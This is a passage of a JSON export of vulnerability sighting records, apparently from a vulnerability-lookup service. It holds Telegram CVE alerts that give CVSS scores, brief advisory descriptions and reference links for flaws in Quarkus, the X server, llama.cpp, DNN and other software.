"creation_timestamp": "2025-06-23T06:45:51.000000Z"}, {"uuid": "9ebcf034-1c5f-4959-ac0d-4201316fec78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9623-MJ7J-P9V4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19268", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49574\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. In versions prior to 3.24.0, there is a potential data leak when duplicating a duplicated context. Quarkus extensively uses the Vert.x duplicated context to implement context propagation. With the new semantic data from one transaction can leak to the data from another transaction. From a Vert.x point of view, this new semantic clarifies the behavior. A significant amount of data is stored in the duplicated context, including request scope, security details, and metadata. Duplicating a duplicated context is rather rare and is only done in a few places. This issue has been patched in version 3.24.0.\n\ud83d\udccf Published: 2025-06-23T19:47:05.454Z\n\ud83d\udccf Modified: 2025-06-23T19:47:05.454Z\n\ud83d\udd17 References:\n1. https://github.com/quarkusio/quarkus/security/advisories/GHSA-9623-mj7j-p9v4\n2. https://github.com/quarkusio/quarkus/issues/48227\n3. https://github.com/quarkusio/quarkus/commit/2b58f59f4bf0bae7d35b1abb585b65f2a66787d1", "creation_timestamp": "2025-06-23T20:47:31.000000Z"}, {"uuid": "d21dd9a2-9fe5-44e0-a19b-11c00e9e4a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F8R-9483-PFXJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19267", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-47688\n\ud83d\udd25 CVSS Score: 5.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L)\n\ud83d\udd39 Description: In WhiteBeam 0.2.0 through 0.2.1 before 0.2.2, a user with local access to a server can bypass the allow-list functionality because a file can be truncated in the OpenFileDescriptor action before the VerifyCanWrite action is performed.\n\ud83d\udccf Published: 2025-06-23T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-23T19:49:24.458Z\n\ud83d\udd17 References:\n1. https://github.com/WhiteBeamSec/WhiteBeam/security/advisories/GHSA-3f8r-9483-pfxj\n2. https://github.com/WhiteBeamSec/WhiteBeam/security/policy\n3. https://github.com/WhiteBeamSec/WhiteBeam/pull/22", "creation_timestamp": "2025-06-23T20:47:29.000000Z"}, {"uuid": "fb3a0aac-be61-418a-8bbe-10181bd9f54e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9303", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19183", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49178\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X server's request handling. Non-zero 'bytes to ignore' in a client's request can cause the server to skip processing another client's request, potentially leading to a denial of service.\n\ud83d\udccf Published: 2025-06-17T14:54:42.646Z\n\ud83d\udccf Modified: 2025-06-23T06:33:59.973Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49178\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369977", "creation_timestamp": "2025-06-23T06:45:53.000000Z"}, {"uuid": "e6579e9a-471d-4bd6-b9f2-961977b2ee49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6973-8887-87FF", "type": "published-proof-of-concept", "source": "Telegram/he0Z1Xxb4PMjQ5eYVBKNY_LHtJZg-G0d3XJmG72co7nWMuw", "content": "", "creation_timestamp": "2026-04-22T21:21:17.000000Z"}, {"uuid": "aebb50ef-cda4-401d-abe0-49273199aba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9306", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19182", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49179\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Record extension. The RecordSanityCheckRegisterClients function does not check for an integer overflow when computing request length, which allows a client to bypass length checks.\n\ud83d\udccf Published: 2025-06-17T14:54:49.288Z\n\ud83d\udccf Modified: 2025-06-23T06:34:29.129Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49179\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369978", "creation_timestamp": "2025-06-23T06:45:51.000000Z"}, {"uuid": "7666d4f1-80ed-40ba-a483-fe75f530efd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9303", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19182", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49179\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Record extension. The RecordSanityCheckRegisterClients function does not check for an integer overflow when computing request length, which allows a client to bypass length checks.\n\ud83d\udccf Published: 2025-06-17T14:54:49.288Z\n\ud83d\udccf Modified: 2025-06-23T06:34:29.129Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49179\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369978", "creation_timestamp": "2025-06-23T06:45:51.000000Z"}, {"uuid": "e491701f-cb15-4e98-8e6d-6cd01150f970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19182", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49179\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Record extension. The RecordSanityCheckRegisterClients function does not check for an integer overflow when computing request length, which allows a client to bypass length checks.\n\ud83d\udccf Published: 2025-06-17T14:54:49.288Z\n\ud83d\udccf Modified: 2025-06-23T06:34:29.129Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49179\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369978", "creation_timestamp": "2025-06-23T06:45:51.000000Z"}, {"uuid": "fd509ff7-6571-4b5d-ba8f-7ee8f953c1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9303", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19185", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49175\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Rendering extension's handling of animated cursors. If a client provides no cursors, the server assumes at least one is present, leading to an out-of-bounds read and potential crash.\n\ud83d\udccf Published: 2025-06-17T14:39:39.428Z\n\ud83d\udccf Modified: 2025-06-23T06:33:16.764Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49175\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369947", "creation_timestamp": "2025-06-23T06:45:55.000000Z"}, {"uuid": "86fc028c-811e-4cdb-be6d-91dd7a8406f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19183", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49178\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X server's request handling. Non-zero 'bytes to ignore' in a client's request can cause the server to skip processing another client's request, potentially leading to a denial of service.\n\ud83d\udccf Published: 2025-06-17T14:54:42.646Z\n\ud83d\udccf Modified: 2025-06-23T06:33:59.973Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49178\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369977", "creation_timestamp": "2025-06-23T06:45:53.000000Z"}, {"uuid": "e1c09986-91b6-4466-867b-640be6503fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19183", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49178\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X server's request handling. Non-zero 'bytes to ignore' in a client's request can cause the server to skip processing another client's request, potentially leading to a denial of service.\n\ud83d\udccf Published: 2025-06-17T14:54:42.646Z\n\ud83d\udccf Modified: 2025-06-23T06:33:59.973Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49178\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369977", "creation_timestamp": "2025-06-23T06:45:53.000000Z"}, {"uuid": "5335509f-9eac-4cb4-84be-c844c947dba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19184", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49176\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the Big Requests extension. The request length is multiplied by 4 before checking against the maximum allowed size, potentially causing an integer overflow and bypassing the size check.\n\ud83d\udccf Published: 2025-06-17T14:49:49.143Z\n\ud83d\udccf Modified: 2025-06-23T06:33:35.083Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49176\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369954", "creation_timestamp": "2025-06-23T06:45:54.000000Z"}, {"uuid": "4adc2707-7ef8-4a55-af6e-af97b9729c15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49180\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the RandR extension, where the RRChangeProviderProperty function does not properly validate input. This issue leads to an integer overflow when computing the total size to allocate.\n\ud83d\udccf Published: 2025-06-17T15:00:18.145Z\n\ud83d\udccf Modified: 2025-06-23T06:34:54.352Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49180\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369981", "creation_timestamp": "2025-06-23T06:45:50.000000Z"}, {"uuid": "f018109a-02a6-48b0-b861-29c1761b5179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9303", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19184", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49176\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the Big Requests extension. The request length is multiplied by 4 before checking against the maximum allowed size, potentially causing an integer overflow and bypassing the size check.\n\ud83d\udccf Published: 2025-06-17T14:49:49.143Z\n\ud83d\udccf Modified: 2025-06-23T06:33:35.083Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49176\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369954", "creation_timestamp": "2025-06-23T06:45:54.000000Z"}, {"uuid": "de74a0d4-0903-4973-95f5-e5cdfe9d80dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19184", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49176\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the Big Requests extension. The request length is multiplied by 4 before checking against the maximum allowed size, potentially causing an integer overflow and bypassing the size check.\n\ud83d\udccf Published: 2025-06-17T14:49:49.143Z\n\ud83d\udccf Modified: 2025-06-23T06:33:35.083Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49176\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369954", "creation_timestamp": "2025-06-23T06:45:54.000000Z"}, {"uuid": "6f58e010-fa5a-4a45-b1a2-5887a6fd1d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9306", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19185", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49175\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Rendering extension's handling of animated cursors. If a client provides no cursors, the server assumes at least one is present, leading to an out-of-bounds read and potential crash.\n\ud83d\udccf Published: 2025-06-17T14:39:39.428Z\n\ud83d\udccf Modified: 2025-06-23T06:33:16.764Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49175\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369947", "creation_timestamp": "2025-06-23T06:45:55.000000Z"}, {"uuid": "f2935bd5-e732-4aea-b5ed-84d67ca06504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19185", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49175\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Rendering extension's handling of animated cursors. If a client provides no cursors, the server assumes at least one is present, leading to an out-of-bounds read and potential crash.\n\ud83d\udccf Published: 2025-06-17T14:39:39.428Z\n\ud83d\udccf Modified: 2025-06-23T06:33:16.764Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49175\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369947", "creation_timestamp": "2025-06-23T06:45:55.000000Z"}, {"uuid": "1190aa26-8c9c-4018-8489-4aa195fa3c98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQPX-F6RC-7HM5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18939", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48058\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to version 6.7.2, there is a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the PowSyBl's DataSource mechanism. If successfully exploited, a malicious actor can cause significant CPU consumption due to regex backtracking \u2014 even with polynomial patterns. This issue has been patched in com.powsybl:powsybl-commons: 6.7.2.\n\ud83d\udccf Published: 2025-06-20T00:39:06.725Z\n\ud83d\udccf Modified: 2025-06-20T13:28:27.265Z\n\ud83d\udd17 References:\n1. https://github.com/powsybl/powsybl-core/security/advisories/GHSA-rqpx-f6rc-7hm5\n2. https://github.com/powsybl/powsybl-core/commit/72f79dec6d4292f892fbddd68a19c67935c7d81f\n3. https://github.com/powsybl/powsybl-core/releases/tag/v6.7.2", "creation_timestamp": "2025-06-20T13:42:50.000000Z"}, {"uuid": "b2b78b78-6317-4c40-b7c0-116a638dbf05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PF4H-VRV6-CMVR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19104", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52486\n\ud83d\udd25 CVSS Score: 6.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows specially crafted content in URLs to be used with TokenReplace and not be properly sanitized by some SkinObjects. This issue has been patched in version 10.0.1.\n\ud83d\udccf Published: 2025-06-21T02:42:47.816Z\n\ud83d\udccf Modified: 2025-06-21T02:42:47.816Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-pf4h-vrv6-cmvr\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/74f6de68da1572c1d7e9c6e30e9f77f7c5596b1b", "creation_timestamp": "2025-06-21T03:45:48.000000Z"}, {"uuid": "7145aa49-9305-4874-8f4a-f3500194175a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F55J-VVR9-69XV", "type": "published-proof-of-concept", "source": "Telegram/T-tSUe4gAAJ730TQ0PlGw8q14q5lnUsjAniTyA8QTkzNFGU", "content": "", "creation_timestamp": "2026-04-22T15:17:58.000000Z"}, {"uuid": "a241d669-5342-4c7f-93a7-c26b515fca6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X7CQ-4F4C-8QCV", "type": "seen", "source": "Telegram/oyZMMan-s6Tiqp0E7GyRtqQJ5Rv8-WlZqCZQGxoSrT1vjc4", "content": "", "creation_timestamp": "2026-04-22T23:21:08.000000Z"}, {"uuid": "a8b99fd7-a5e1-4b72-bca3-d6c94da7cbb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W36R-9JVX-Q48V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19235", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49126\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS (Cross-Site Scripting) attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation uses the get_swagger_ui_html function from FastAPI. This function does not encode or sanitize its arguments before using them to generate the HTML for the swagger documentation page and is not intended to be used with user-controlled arguments. Any user of this application can be targeted with a one-click attack that can takeover their session and all the secrets that may be contained within it. This issue has been patched in version 2.5.1.\n\ud83d\udccf Published: 2025-06-23T17:18:51.857Z\n\ud83d\udccf Modified: 2025-06-23T17:39:29.542Z\n\ud83d\udd17 References:\n1. https://github.com/Visionatrix/Visionatrix/security/advisories/GHSA-w36r-9jvx-q48v\n2. https://github.com/Visionatrix/Visionatrix/commit/63aafe6e4d1bffe4bf69e73b6fdfc65c71a8f5b8", "creation_timestamp": "2025-06-23T17:45:17.000000Z"}, {"uuid": "44741965-d3ec-4a7b-b8c7-c1b143a3d6f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ7C-2P5Q-G56M", "type": "seen", "source": "Telegram/bXcnMEVg4MqmghIUy-Ivhp7SDQD9oC-u5oUbMXpQMRT1SlU", "content": "", "creation_timestamp": "2026-04-22T23:20:48.000000Z"}, {"uuid": "985f775f-f5be-47c0-b658-0e2003e1ee86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49VV-25QX-MG44", "type": "seen", "source": "Telegram/bXcnMEVg4MqmghIUy-Ivhp7SDQD9oC-u5oUbMXpQMRT1SlU", "content": "", "creation_timestamp": "2026-04-22T23:20:48.000000Z"}, {"uuid": "f8e630e8-be6f-4aad-88e3-20de5a7038b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q6M-7H5J-JQ4G", "type": "seen", "source": "Telegram/bXcnMEVg4MqmghIUy-Ivhp7SDQD9oC-u5oUbMXpQMRT1SlU", "content": "", "creation_timestamp": "2026-04-22T23:20:48.000000Z"}, {"uuid": "f1f813be-8d3b-40eb-a897-9b6ba21d2180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M22-GVQM-JV97", "type": "seen", "source": "Telegram/bXcnMEVg4MqmghIUy-Ivhp7SDQD9oC-u5oUbMXpQMRT1SlU", "content": "", "creation_timestamp": "2026-04-22T23:20:48.000000Z"}, {"uuid": "0395774d-37b9-491a-9493-845341ee3241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RXV-5JHH-J6XX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19297", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52566\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: llama.cpp is an inference of several LLM models in C/C++. Prior to version b5721, there is a signed vs. unsigned integer overflow in llama.cpp's tokenizer implementation (llama_vocab::tokenize) (src/llama-vocab.cpp:3036) resulting in unintended behavior in tokens copying size comparison. Allowing heap-overflowing llama.cpp inferencing engine with carefully manipulated text input during tokenization process. This issue has been patched in version b5721.\n\ud83d\udccf Published: 2025-06-24T03:21:19.009Z\n\ud83d\udccf Modified: 2025-06-24T03:21:19.009Z\n\ud83d\udd17 References:\n1. https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-7rxv-5jhh-j6xx\n2. https://github.com/ggml-org/llama.cpp/commit/dd6e6d0b6a4bbe3ebfc931d1eb14db2f2b1d70af", "creation_timestamp": "2025-06-24T03:48:12.000000Z"}, {"uuid": "a2d088b2-bfa0-4bf6-8d20-98d9c18e347b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQ37-G2QP-3C2P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19248", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48957\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: AstrBot is a large language model chatbot and development framework. A path traversal vulnerability present in versions 3.4.4 through 3.5.12 may lead to information 